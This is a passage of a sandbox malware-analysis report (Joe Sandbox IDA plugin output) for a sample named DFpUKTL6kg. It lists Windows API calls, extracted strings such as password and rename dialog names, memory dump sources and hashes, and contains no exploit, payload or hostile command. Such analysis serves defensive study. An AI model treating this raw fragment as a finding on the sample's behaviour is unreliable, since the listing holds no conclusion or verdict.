                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ItemText$DialogWindow
                  • String ID: GETPASSWORD1
                  • API String ID: 445417207-3292211884
                  • Opcode ID: b8f4f87382bc40cc3f0ae8cfe2b36b91c9c3b884cfc12e3ec58e24dc2c818aae
                  • Instruction ID: b83ab3ca5ece74237600f41fb75786bca18cdadcba651cac2a52c34510484191
                  • Opcode Fuzzy Hash: b8f4f87382bc40cc3f0ae8cfe2b36b91c9c3b884cfc12e3ec58e24dc2c818aae
                  • Instruction Fuzzy Hash: 2911A532A4031C7ADB219BA8AD49FFA7B7CEB6A791F010021FA45A20D0C2619D55D7A2
                  APIs
                  • _swprintf.LIBCMT ref: 009FB51E
                    • Part of subcall function 009F400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F401D
                  • _wcschr.LIBVCRUNTIME ref: 009FB53C
                  • _wcschr.LIBVCRUNTIME ref: 009FB54C
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _wcschr$__vswprintf_c_l_swprintf
                  • String ID: %c:\
                  • API String ID: 525462905-3142399695
                  • Opcode ID: f04bb2defaf0bee5abf0fdb7cb47733ba1c5e2bbb809759a2e24d4a7f268d63e
                  • Instruction ID: 92ae8f6761c70cec3fdf03e4c6503e4e07fc7dd6b499450a26578220a0c11764
                  • Opcode Fuzzy Hash: f04bb2defaf0bee5abf0fdb7cb47733ba1c5e2bbb809759a2e24d4a7f268d63e
                  • Instruction Fuzzy Hash: 0801F953904329BACB206F75DC42D7BB7ACDF953B07504816FA55C6081FB28D940C3A1
                  APIs
                  • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,009FABC5,00000008,?,00000000,?,009FCB88,?,00000000), ref: 00A006F3
                  • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,009FABC5,00000008,?,00000000,?,009FCB88,?,00000000), ref: 00A006FD
                  • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,009FABC5,00000008,?,00000000,?,009FCB88,?,00000000), ref: 00A0070D
                  Strings
                  • Thread pool initialization failed., xrefs: 00A00725
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Create$CriticalEventInitializeSectionSemaphore
                  • String ID: Thread pool initialization failed.
                  • API String ID: 3340455307-2182114853
                  • Opcode ID: 61f04e58b0e13848cdd4931fb626ddbc4ff2a6d773318ce5bfbfaefd0d244675
                  • Instruction ID: a6dc123fa28527de3659c8f27b01d33a666c994002587040422c23dab2e24cb5
                  • Opcode Fuzzy Hash: 61f04e58b0e13848cdd4931fb626ddbc4ff2a6d773318ce5bfbfaefd0d244675
                  • Instruction Fuzzy Hash: 5F1173B2504708AFC3315F69E884AA7FBECEF95754F10482EF1DA82240D6B56981CB64
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: RENAMEDLG$REPLACEFILEDLG
                  • API String ID: 0-56093855
                  • Opcode ID: 0837152e5501b6b529110ab79279e67c275ad9e7f912e25d44296fe78eb8bbc2
                  • Instruction ID: 3f8b344defd0abbdc8e0baa203f8062f94057cb03ecca72f1dd9ee13f5abd0d3
                  • Opcode Fuzzy Hash: 0837152e5501b6b529110ab79279e67c275ad9e7f912e25d44296fe78eb8bbc2
                  • Instruction Fuzzy Hash: 1501BC76A0034DAFCB11CFE8FD44E5A3BA9F749791B004425F905922B0C7729C51EBA2
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: __alldvrm$_strrchr
                  • String ID:
                  • API String ID: 1036877536-0
                  • Opcode ID: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                  • Instruction ID: 855e325af083650c116a6c2d307578ab3ea791503c52d5cbca58fff6dd6552b3
                  • Opcode Fuzzy Hash: e90b1fa23aba202bba093109adefdb56eea12b49e9ded63ef510ee75c2e44a9f
                  • Instruction Fuzzy Hash: 14A14672A003869FEB21CF68C8A17EFBBE5EF55350F18456DE4959B281C2389982C751
                  APIs
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000000,?,009F80B7,?,?,?), ref: 009FA351
                  • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,00000000,?,009F80B7,?,?), ref: 009FA395
                  • SetFileTime.KERNEL32(?,00000800,?,00000000,?,00000000,?,009F80B7,?,?,?,?,?,?,?,?), ref: 009FA416
                  • CloseHandle.KERNEL32(?,?,00000000,?,009F80B7,?,?,?,?,?,?,?,?,?,?,?), ref: 009FA41D
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$Create$CloseHandleTime
                  • String ID:
                  • API String ID: 2287278272-0
                  • Opcode ID: ed310521e33f2028c5c3ceb693cde28e652e48c8c1cd2f65025725a032495698
                  • Instruction ID: 74a57e6a57003c9edd88b64b4e2907bea2fd9c16130a812d59f842c540db6689
                  • Opcode Fuzzy Hash: ed310521e33f2028c5c3ceb693cde28e652e48c8c1cd2f65025725a032495698
                  • Instruction Fuzzy Hash: 0C41FFB12483896AE731DF64DC45FFEBBE8AB81300F04091DB6D8D71D0D6A89A48DB13
                  APIs
                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00A189AD,?,00000000,?,00000001,?,?,00000001,00A189AD,?), ref: 00A1C0E6
                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00A1C16F
                  • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00A167E2,?), ref: 00A1C181
                  • __freea.LIBCMT ref: 00A1C18A
                    • Part of subcall function 00A18518: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00A1C13D,00000000,?,00A167E2,?,00000008,?,00A189AD,?,?,?), ref: 00A1854A
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                  • String ID:
                  • API String ID: 2652629310-0
                  • Opcode ID: b6783cbd3949d03695b135efe161edb79d96c635fb31ea55c8838bbb4d7c89f8
                  • Instruction ID: a0be6a4024bb785052a92f0f1ce01dedb384b5d028073cc06ac79cd187428c3b
                  • Opcode Fuzzy Hash: b6783cbd3949d03695b135efe161edb79d96c635fb31ea55c8838bbb4d7c89f8
                  • Instruction Fuzzy Hash: EB31CF72A4021AABDF25CFA8DC45DEE7BA5EB44720F140228FC05D7291EB35CD91CBA0
                  APIs
                  • ___BuildCatchObject.LIBVCRUNTIME ref: 00A1251A
                    • Part of subcall function 00A12B52: ___AdjustPointer.LIBCMT ref: 00A12B9C
                  • _UnwindNestedFrames.LIBCMT ref: 00A12531
                  • ___FrameUnwindToState.LIBVCRUNTIME ref: 00A12543
                  • CallCatchBlock.LIBVCRUNTIME ref: 00A12567
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                  • String ID:
                  • API String ID: 2633735394-0
                  • Opcode ID: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction ID: 4c9b9e62c25284df2b047f70112c6cfc9e0e313a81f33c79a33b865c26e99f7e
                  • Opcode Fuzzy Hash: 8ab29acd33a3066b3f23f97a448595ce03f4b23344991831e99f7cf6ac797a0c
                  • Instruction Fuzzy Hash: 7B012532000108BFCF229F65DD41EDA3BBAEF58760F058014FD1866120D336E9B1EBA1
                  APIs
                  • GetDC.USER32(00000000), ref: 00A09DBE
                  • GetDeviceCaps.GDI32(00000000,00000058), ref: 00A09DCD
                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00A09DDB
                  • ReleaseDC.USER32(00000000,00000000), ref: 00A09DE9
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CapsDevice$Release
                  • String ID:
                  • API String ID: 1035833867-0
                  • Opcode ID: 429808d65a517c12346341b45e79174174617ff1eccd21d07d2ff6c5801b5907
                  • Instruction ID: 5abf5762fc45fe2bb6d294e4d1f1e41952d08457d002954879f46c976b3282e7
                  • Opcode Fuzzy Hash: 429808d65a517c12346341b45e79174174617ff1eccd21d07d2ff6c5801b5907
                  • Instruction Fuzzy Hash: C5E0EC31A86721A7D3609BE4BC0DB8B3B64BB1A713F050005F605961D0DA744846CB90
                  APIs
                  • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00A12016
                  • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00A1201B
                  • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00A12020
                    • Part of subcall function 00A1310E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00A1311F
                  • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00A12035
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                  • String ID:
                  • API String ID: 1761009282-0
                  • Opcode ID: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction ID: e92459abba3f443bc0bf3ec36876c1738101355487d5b5d9c43d82a9a924420e
                  • Opcode Fuzzy Hash: 50341c1e121bd6f5d5b78c5b3ee2afe6a0478775b34c66270a9efbcfed992c13
                  • Instruction Fuzzy Hash: 0EC00226004640A41C217EB223023E9070408667C5B9223C2A890171039E068AEAA33A
                  APIs
                    • Part of subcall function 00A09DF1: GetDC.USER32(00000000), ref: 00A09DF5
                    • Part of subcall function 00A09DF1: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00A09E00
                    • Part of subcall function 00A09DF1: ReleaseDC.USER32(00000000,00000000), ref: 00A09E0B
                  • GetObjectW.GDI32(?,00000018,?), ref: 00A09F8D
                    • Part of subcall function 00A0A1E5: GetDC.USER32(00000000), ref: 00A0A1EE
                    • Part of subcall function 00A0A1E5: GetObjectW.GDI32(?,00000018,?), ref: 00A0A21D
                    • Part of subcall function 00A0A1E5: ReleaseDC.USER32(00000000,?), ref: 00A0A2B5
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: ObjectRelease$CapsDevice
                  • String ID: (
                  • API String ID: 1061551593-3887548279
                  • Opcode ID: 80550c7e582ce7b732607962b0058670ac13a7b2ee158f45816a70102db4eb16
                  • Instruction ID: 5f5b6ebdb995777536e903de09ac0367abaec98214adb00ac91753833beb7790
                  • Opcode Fuzzy Hash: 80550c7e582ce7b732607962b0058670ac13a7b2ee158f45816a70102db4eb16
                  • Instruction Fuzzy Hash: E9811671608318DFC614DF69D844A6ABBE9FF99704F00492DF986D72A0CB35AD06CB52
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: _swprintf
                  • String ID: %ls$%s: %s
                  • API String ID: 589789837-2259941744
                  • Opcode ID: e375cd32eedf0555892a63af3e36a27cc26f980c9ed1f9fecfc99034b7639475
                  • Instruction ID: 3ce1fc1c7be0e0412f5b157850ca31b03570d26d5be1a79bc6b4ec98a779d31b
                  • Opcode Fuzzy Hash: e375cd32eedf0555892a63af3e36a27cc26f980c9ed1f9fecfc99034b7639475
                  • Instruction Fuzzy Hash: 5D51C73128C70DFAEB211AA4FD42F767A76AB05B00F204916F3DB748D1C6A26550B713
                  APIs
                  • __EH_prolog.LIBCMT ref: 009F7730
                  • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 009F78CC
                    • Part of subcall function 009FA444: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA458
                    • Part of subcall function 009FA444: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,009FA27A,?,?,?,009FA113,?,00000001,00000000,?,?), ref: 009FA489
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: File$Attributes$H_prologTime
                  • String ID: :
                  • API String ID: 1861295151-336475711
                  • Opcode ID: 2b82f63e47c9f3f07019e9df08be8b66a29324431a3f3102aa4d7675399052b9
                  • Instruction ID: ec5456b68dec98191185db7350d3025827bd9e27aa3dba4f2545f657477ef7d9
                  • Opcode Fuzzy Hash: 2b82f63e47c9f3f07019e9df08be8b66a29324431a3f3102aa4d7675399052b9
                  • Instruction Fuzzy Hash: 9C414F7190526CAADB25EB90DD59FFEB37CAF85340F0040AAB709A2092DB745F84DF61
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: UNC$\\?\
                  • API String ID: 0-253988292
                  • Opcode ID: 4b997ce78861c54bce76da8e46e87d0079b744db288f6dedb1c222b2dabc138a
                  • Instruction ID: 861bbfb8fb93b718ccb15028cd81ecd0f7a44040090497c4f771a675d580e27d
                  • Opcode Fuzzy Hash: 4b997ce78861c54bce76da8e46e87d0079b744db288f6dedb1c222b2dabc138a
                  • Instruction Fuzzy Hash: CF418B3680022DBACF20BF21DC41EFB77ADAF85790B144425FB54A7552E774EA90CBA0
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID:
                  • String ID: Shell.Explorer$about:blank
                  • API String ID: 0-874089819
                  • Opcode ID: dea5e1813542d49363af133136716eb5c812003229e3fce69b6ffe32d59db5e8
                  • Instruction ID: d8866469209198d81087ae28ce94785b27f3e8118a5a8e2b7ed889cb46044801
                  • Opcode Fuzzy Hash: dea5e1813542d49363af133136716eb5c812003229e3fce69b6ffe32d59db5e8
                  • Instruction Fuzzy Hash: 7F21A2717043189FCB18EF68E895A2B77A9FF88311B14856DF8498B2C2DB70EC01CB60
                  APIs
                    • Part of subcall function 009FEB73: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 009FEB92
                    • Part of subcall function 009FEB73: GetProcAddress.KERNEL32(00A381C0,CryptUnprotectMemory), ref: 009FEBA2
                  • GetCurrentProcessId.KERNEL32(?,?,?,009FEBEC), ref: 009FEC84
                  Strings
                  • CryptProtectMemory failed, xrefs: 009FEC3B
                  • CryptUnprotectMemory failed, xrefs: 009FEC7C
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: AddressProc$CurrentProcess
                  • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed
                  • API String ID: 2190909847-396321323
                  • Opcode ID: 34e4abe18e12134e92f75fcc0a25b0e5e9cb7b31a321f281147f3e0ff09a83b0
                  • Instruction ID: ee2f157f6864e8fcc6ff570a1753129d85ec11a4eeacdbb90d2b1e70f505faf1
                  • Opcode Fuzzy Hash: 34e4abe18e12134e92f75fcc0a25b0e5e9cb7b31a321f281147f3e0ff09a83b0
                  • Instruction Fuzzy Hash: 9A112932A0532CABDB259B35DD06A7E3718AF45B20B044125FE856B2A1CB799E4287D4
                  APIs
                  • CreateThread.KERNEL32(00000000,00010000,00A009D0,?,00000000,00000000), ref: 00A008AD
                  • SetThreadPriority.KERNEL32(?,00000000), ref: 00A008F4
                    • Part of subcall function 009F6E91: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 009F6EAF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.1651861484.00000000009F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009F0000, based on PE: true
                  • Associated: 00000000.00000002.1651846547.00000000009F0000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651892149.0000000000A23000.00000002.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A2E000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A34000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651909102.0000000000A51000.00000004.00000001.01000000.00000003.sdmp
                  • Associated: 00000000.00000002.1651956983.0000000000A52000.00000002.00000001.01000000.00000003.sdmp
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_9f0000_DFpUKTL6kg.jbxd
                  Similarity
                  • API ID: Thread$CreatePriority__vswprintf_c_l
                  • String ID: CreateThread failed
                  • API String ID: 2655393344-3849766595
                  • Opcode ID: 638905f698b0f9436871b4366eb4e70c493ed1711159ec0bdf09275433cee528
                  • Instruction ID: e659eb1eb2f27c63189c7b3b01f5fa9e51953ebd71d985bea0378d0e1eb46b7b
                  • Opcode Fuzzy Hash: 638905f698b0f9436871b4366eb4e70c493ed1711159ec0bdf09275433cee528
                  • Instruction Fuzzy Hash: 1101D6B23443096FD634AF64FD81F767398FB45711F10053DF686921C0CAA1A8459764
                  APIs
                    • Part of subcall function 009FDA98: _swprintf.LIBCMT ref: 009FDABE
